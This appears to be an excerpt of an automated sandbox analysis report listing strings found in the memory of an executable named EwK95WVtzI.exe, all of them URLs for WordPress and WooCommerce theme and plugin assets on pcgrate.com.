                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
